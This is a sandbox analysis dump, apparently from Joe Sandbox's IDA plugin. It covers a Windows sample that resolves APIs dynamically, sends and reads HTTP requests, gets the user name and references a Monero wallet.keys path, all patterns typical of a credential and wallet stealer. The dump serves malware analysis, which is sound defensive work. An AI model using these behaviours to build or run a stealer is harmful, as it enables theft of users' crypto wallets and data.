                                    • Opcode Fuzzy Hash: 7baeb3013c8c4ad9874623f591cfdb7c2e4ba621dc22f3683db2fd1c92a4c573
                                    • Instruction Fuzzy Hash: 73A1AEB55012889FC344EFA8FD8CE6AB7F9F74C309704861AE60AC7264D7399846CB56

                                    Control-flow Graph

                                    control_flow_graph 677 845c0-84695 RtlAllocateHeap 694 846a0-846a6 677->694 695 846ac-8474a 694->695 696 8474f-847a9 VirtualProtect 694->696 695->694
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0008460F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0008479C
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000845C7, 000845F3, 00084622, 00084638, 00084643, 00084657, 00084662, 00084683, 000846B7, 000846C2, 000846D8, 00084729, 00084734, 0008473F, 0008474F, 00084765, 00084770, 0008477B
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000845DD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084713
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008466D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000846AC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008471E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084678
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000845D2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000845E8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000846CD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008475A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: 718b049d48c94c869f044323da6e99f76fd660d4452e05cd7a8de79012f95b28
                                    • Instruction ID: 63813017ed6a2a6fd9d3b553e599e8b5a583fcfa7f731138a1df67ca7b47584c
                                    • Opcode Fuzzy Hash: 718b049d48c94c869f044323da6e99f76fd660d4452e05cd7a8de79012f95b28
                                    • Instruction Fuzzy Hash: A941F9606CB60C7EEE34BFE49C45E9F76966FC770DF5092C8EA045A290EBB065004926

                                    Control-flow Graph

                                    control_flow_graph 801 84880-84942 call 9a7a0 call 847b0 call 9a740 * 5 InternetOpenA StrCmpCA 816 8494b-8494f 801->816 817 84944 801->817 818 84ecb-84ef3 InternetCloseHandle call 9aad0 call 89ac0 816->818 819 84955-84acd call 98b60 call 9a920 call 9a8a0 call 9a800 * 2 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a920 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a920 call 9a8a0 call 9a800 * 2 InternetConnectA 816->819 817->816 829 84f32-84fa2 call 98990 * 2 call 9a7a0 call 9a800 * 8 818->829 830 84ef5-84f2d call 9a820 call 9a9b0 call 9a8a0 call 9a800 818->830 819->818 905 84ad3-84ad7 819->905 830->829 906 84ad9-84ae3 905->906 907 84ae5 905->907 908 84aef-84b22 HttpOpenRequestA 906->908 907->908 909 84b28-84e28 call 9a9b0 call 9a8a0 call 9a800 call 9a920 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a920 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a920 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a920 call 9a8a0 call 9a800 call 9a740 call 9a920 * 2 call 9a8a0 call 9a800 * 2 call 9aad0 lstrlen call 9aad0 * 2 lstrlen call 9aad0 HttpSendRequestA 908->909 910 84ebe-84ec5 InternetCloseHandle 908->910 1021 84e32-84e5c InternetReadFile 909->1021 910->818 1022 84e5e-84e65 1021->1022 1023 84e67-84eb9 InternetCloseHandle call 9a800 1021->1023 1022->1023 1024 84e69-84ea7 call 9a9b0 call 9a8a0 call 9a800 1022->1024 1023->910 1024->1021
                                    APIs
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                      • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00084915
                                    • StrCmpCA.SHLWAPI(?,00D3FCE0), ref: 0008493A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00084ABA
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,000A0DDB,00000000,?,?,00000000,?,",00000000,?,00D3FC40), ref: 00084DE8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00084E04
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00084E18
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00084E49
                                    • InternetCloseHandle.WININET(00000000), ref: 00084EAD
                                    • InternetCloseHandle.WININET(00000000), ref: 00084EC5
                                    • HttpOpenRequestA.WININET(00000000,00D3FC80,?,00D3F488,00000000,00000000,00400100,00000000), ref: 00084B15
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00084ECF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: a624af047b8fece6097a8ed78d238438dda7284ed3aed18ebaa4a40c40d31f87
                                    • Instruction ID: 4c18cf2490dd39e7c8b13e000ce1ed5bf9e26f55d42465214fb459e36855241e
                                    • Opcode Fuzzy Hash: a624af047b8fece6097a8ed78d238438dda7284ed3aed18ebaa4a40c40d31f87
                                    • Instruction Fuzzy Hash: 5312CF71A20118AADF15EB90DC96FEEB379BF16300F504199B10676092EF702F49DFA2
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000811B7), ref: 00097880
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00097887
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0009789F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 614b0fcd994c3d83917f759b487050d431e94c03b0cbe90959e3784c8547d5e9
                                    • Instruction ID: a8bae039c7c2b01d4bbbdb59434ce0e10438c5f3eea8fc606210a8fa597c2efc
                                    • Opcode Fuzzy Hash: 614b0fcd994c3d83917f759b487050d431e94c03b0cbe90959e3784c8547d5e9
                                    • Instruction Fuzzy Hash: 19F04FB1944208EBCB10DF99ED4AFAEFBB8FB04715F10025AFA05A2680C77815048BA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 9ef3ce689785a444d22c596ed9b6314c0b79ae63f1b4e4aa65fa001f3d2e59dc
                                    • Instruction ID: 416f94bce9d38f5526209010d0599e43a6356f42bdb776f5bc85f33f1fdb1f7f
                                    • Opcode Fuzzy Hash: 9ef3ce689785a444d22c596ed9b6314c0b79ae63f1b4e4aa65fa001f3d2e59dc
                                    • Instruction Fuzzy Hash: F5D09E7490430CDBCB04EFE0ED8DADDBB78FB08715F101555D90562340EA315596CBA6

                                    Control-flow Graph

                                    control_flow_graph 633 99c10-99c1a 634 99c20-9a031 GetProcAddress * 43 633->634 635 9a036-9a0ca LoadLibraryA * 8 633->635 634->635 636 9a0cc-9a141 GetProcAddress * 5 635->636 637 9a146-9a14d 635->637 636->637 638 9a153-9a211 GetProcAddress * 8 637->638 639 9a216-9a21d 637->639 638->639 640 9a298-9a29f 639->640 641 9a21f-9a293 GetProcAddress * 5 639->641 642 9a2a5-9a332 GetProcAddress * 6 640->642 643 9a337-9a33e 640->643 641->640 642->643 644 9a41f-9a426 643->644 645 9a344-9a41a GetProcAddress * 9 643->645 646 9a428-9a49d GetProcAddress * 5 644->646 647 9a4a2-9a4a9 644->647 645->644 646->647 648 9a4ab-9a4d7 GetProcAddress * 2 647->648 649 9a4dc-9a4e3 647->649 648->649 650 9a515-9a51c 649->650 651 9a4e5-9a510 GetProcAddress * 2 649->651 652 9a612-9a619 650->652 653 9a522-9a60d GetProcAddress * 10 650->653 651->650 654 9a61b-9a678 GetProcAddress * 4 652->654 655 9a67d-9a684 652->655 653->652 654->655 656 9a69e-9a6a5 655->656 657 9a686-9a699 GetProcAddress 655->657 658 9a708-9a709 656->658 659 9a6a7-9a703 GetProcAddress * 4 656->659 657->656 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(76210000,00D25268), ref: 00099C2D
                                    • GetProcAddress.KERNEL32(76210000,00D24F48), ref: 00099C45
                                    • GetProcAddress.KERNEL32(76210000,00D38E78), ref: 00099C5E
                                    • GetProcAddress.KERNEL32(76210000,00D38E18), ref: 00099C76
                                    • GetProcAddress.KERNEL32(76210000,00D38EF0), ref: 00099C8E
                                    • GetProcAddress.KERNEL32(76210000,00D3DA18), ref: 00099CA7
                                    • GetProcAddress.KERNEL32(76210000,00D2A6D0), ref: 00099CBF
                                    • GetProcAddress.KERNEL32(76210000,00D3D820), ref: 00099CD7
                                    • GetProcAddress.KERNEL32(76210000,00D3DA90), ref: 00099CF0
                                    • GetProcAddress.KERNEL32(76210000,00D3DA60), ref: 00099D08
                                    • GetProcAddress.KERNEL32(76210000,00D3D808), ref: 00099D20
                                    • GetProcAddress.KERNEL32(76210000,00D252A8), ref: 00099D39
                                    • GetProcAddress.KERNEL32(76210000,00D25008), ref: 00099D51
                                    • GetProcAddress.KERNEL32(76210000,00D252E8), ref: 00099D69
                                    • GetProcAddress.KERNEL32(76210000,00D25168), ref: 00099D82
                                    • GetProcAddress.KERNEL32(76210000,00D3D868), ref: 00099D9A
                                    • GetProcAddress.KERNEL32(76210000,00D3D9D0), ref: 00099DB2
                                    • GetProcAddress.KERNEL32(76210000,00D2A658), ref: 00099DCB
                                    • GetProcAddress.KERNEL32(76210000,00D25108), ref: 00099DE3
                                    • GetProcAddress.KERNEL32(76210000,00D3DA30), ref: 00099DFB
                                    • GetProcAddress.KERNEL32(76210000,00D3D940), ref: 00099E14
                                    • GetProcAddress.KERNEL32(76210000,00D3D838), ref: 00099E2C
                                    • GetProcAddress.KERNEL32(76210000,00D3D8C8), ref: 00099E44
                                    • GetProcAddress.KERNEL32(76210000,00D251E8), ref: 00099E5D
                                    • GetProcAddress.KERNEL32(76210000,00D3D850), ref: 00099E75
                                    • GetProcAddress.KERNEL32(76210000,00D3D970), ref: 00099E8D
                                    • GetProcAddress.KERNEL32(76210000,00D3D898), ref: 00099EA6
                                    • GetProcAddress.KERNEL32(76210000,00D3D7F0), ref: 00099EBE
                                    • GetProcAddress.KERNEL32(76210000,00D3D880), ref: 00099ED6
                                    • GetProcAddress.KERNEL32(76210000,00D3D7C0), ref: 00099EEF
                                    • GetProcAddress.KERNEL32(76210000,00D3D7D8), ref: 00099F07
                                    • GetProcAddress.KERNEL32(76210000,00D3D8B0), ref: 00099F1F
                                    • GetProcAddress.KERNEL32(76210000,00D3D9E8), ref: 00099F38
                                    • GetProcAddress.KERNEL32(76210000,00D2FB98), ref: 00099F50
                                    • GetProcAddress.KERNEL32(76210000,00D3DAA8), ref: 00099F68
                                    • GetProcAddress.KERNEL32(76210000,00D3D928), ref: 00099F81
                                    • GetProcAddress.KERNEL32(76210000,00D25188), ref: 00099F99
                                    • GetProcAddress.KERNEL32(76210000,00D3D8E0), ref: 00099FB1
                                    • GetProcAddress.KERNEL32(76210000,00D251A8), ref: 00099FCA
                                    • GetProcAddress.KERNEL32(76210000,00D3DA00), ref: 00099FE2
                                    • GetProcAddress.KERNEL32(76210000,00D3D958), ref: 00099FFA
                                    • GetProcAddress.KERNEL32(76210000,00D24F68), ref: 0009A013
                                    • GetProcAddress.KERNEL32(76210000,00D251C8), ref: 0009A02B
                                    • LoadLibraryA.KERNEL32(00D3DA78,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A03D
                                    • LoadLibraryA.KERNEL32(00D3D8F8,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A04E
                                    • LoadLibraryA.KERNEL32(00D3D910,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A060
                                    • LoadLibraryA.KERNEL32(00D3DA48,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A072
                                    • LoadLibraryA.KERNEL32(00D3D988,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A083
                                    • LoadLibraryA.KERNEL32(00D3D9A0,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A095
                                    • LoadLibraryA.KERNEL32(00D3D9B8,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A0A7
                                    • LoadLibraryA.KERNEL32(00D3DC10,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A0B8
                                    • GetProcAddress.KERNEL32(751E0000,00D25308), ref: 0009A0DA
                                    • GetProcAddress.KERNEL32(751E0000,00D3DB38), ref: 0009A0F2
                                    • GetProcAddress.KERNEL32(751E0000,00D38B68), ref: 0009A10A
                                    • GetProcAddress.KERNEL32(751E0000,00D3DD90), ref: 0009A123
                                    • GetProcAddress.KERNEL32(751E0000,00D25208), ref: 0009A13B
                                    • GetProcAddress.KERNEL32(700F0000,00D2A6F8), ref: 0009A160
                                    • GetProcAddress.KERNEL32(700F0000,00D253A8), ref: 0009A179
                                    • GetProcAddress.KERNEL32(700F0000,00D2A4F0), ref: 0009A191
                                    • GetProcAddress.KERNEL32(700F0000,00D3DAD8), ref: 0009A1A9
                                    • GetProcAddress.KERNEL32(700F0000,00D3DD00), ref: 0009A1C2
                                    • GetProcAddress.KERNEL32(700F0000,00D25688), ref: 0009A1DA
                                    • GetProcAddress.KERNEL32(700F0000,00D256A8), ref: 0009A1F2
                                    • GetProcAddress.KERNEL32(700F0000,00D3DBB0), ref: 0009A20B
                                    • GetProcAddress.KERNEL32(753A0000,00D254C8), ref: 0009A22C
                                    • GetProcAddress.KERNEL32(753A0000,00D25668), ref: 0009A244
                                    • GetProcAddress.KERNEL32(753A0000,00D3DB08), ref: 0009A25D
                                    • GetProcAddress.KERNEL32(753A0000,00D3DB50), ref: 0009A275
                                    • GetProcAddress.KERNEL32(753A0000,00D253E8), ref: 0009A28D
                                    • GetProcAddress.KERNEL32(76310000,00D2A7E8), ref: 0009A2B3
                                    • GetProcAddress.KERNEL32(76310000,00D2A8B0), ref: 0009A2CB
                                    • GetProcAddress.KERNEL32(76310000,00D3DB68), ref: 0009A2E3
                                    • GetProcAddress.KERNEL32(76310000,00D25448), ref: 0009A2FC
                                    • GetProcAddress.KERNEL32(76310000,00D25508), ref: 0009A314
                                    • GetProcAddress.KERNEL32(76310000,00D2A900), ref: 0009A32C
                                    • GetProcAddress.KERNEL32(76910000,00D3DB20), ref: 0009A352
                                    • GetProcAddress.KERNEL32(76910000,00D25388), ref: 0009A36A
                                    • GetProcAddress.KERNEL32(76910000,00D38BC8), ref: 0009A382
                                    • GetProcAddress.KERNEL32(76910000,00D3DC88), ref: 0009A39B
                                    • GetProcAddress.KERNEL32(76910000,00D3DD78), ref: 0009A3B3
                                    • GetProcAddress.KERNEL32(76910000,00D25528), ref: 0009A3CB
                                    • GetProcAddress.KERNEL32(76910000,00D25468), ref: 0009A3E4
                                    • GetProcAddress.KERNEL32(76910000,00D3DCE8), ref: 0009A3FC
                                    • GetProcAddress.KERNEL32(76910000,00D3DAF0), ref: 0009A414
                                    • GetProcAddress.KERNEL32(75B30000,00D25608), ref: 0009A436
                                    • GetProcAddress.KERNEL32(75B30000,00D3DD30), ref: 0009A44E
                                    • GetProcAddress.KERNEL32(75B30000,00D3DC28), ref: 0009A466
                                    • GetProcAddress.KERNEL32(75B30000,00D3DB80), ref: 0009A47F
                                    • GetProcAddress.KERNEL32(75B30000,00D3DC70), ref: 0009A497
                                    • GetProcAddress.KERNEL32(75670000,00D255C8), ref: 0009A4B8
                                    • GetProcAddress.KERNEL32(75670000,00D25348), ref: 0009A4D1
                                    • GetProcAddress.KERNEL32(76AC0000,00D25408), ref: 0009A4F2
                                    • GetProcAddress.KERNEL32(76AC0000,00D3DB98), ref: 0009A50A
                                    • GetProcAddress.KERNEL32(6F4E0000,00D25488), ref: 0009A530
                                    • GetProcAddress.KERNEL32(6F4E0000,00D256C8), ref: 0009A548
                                    • GetProcAddress.KERNEL32(6F4E0000,00D256E8), ref: 0009A560
                                    • GetProcAddress.KERNEL32(6F4E0000,00D3DBC8), ref: 0009A579
                                    • GetProcAddress.KERNEL32(6F4E0000,00D25368), ref: 0009A591
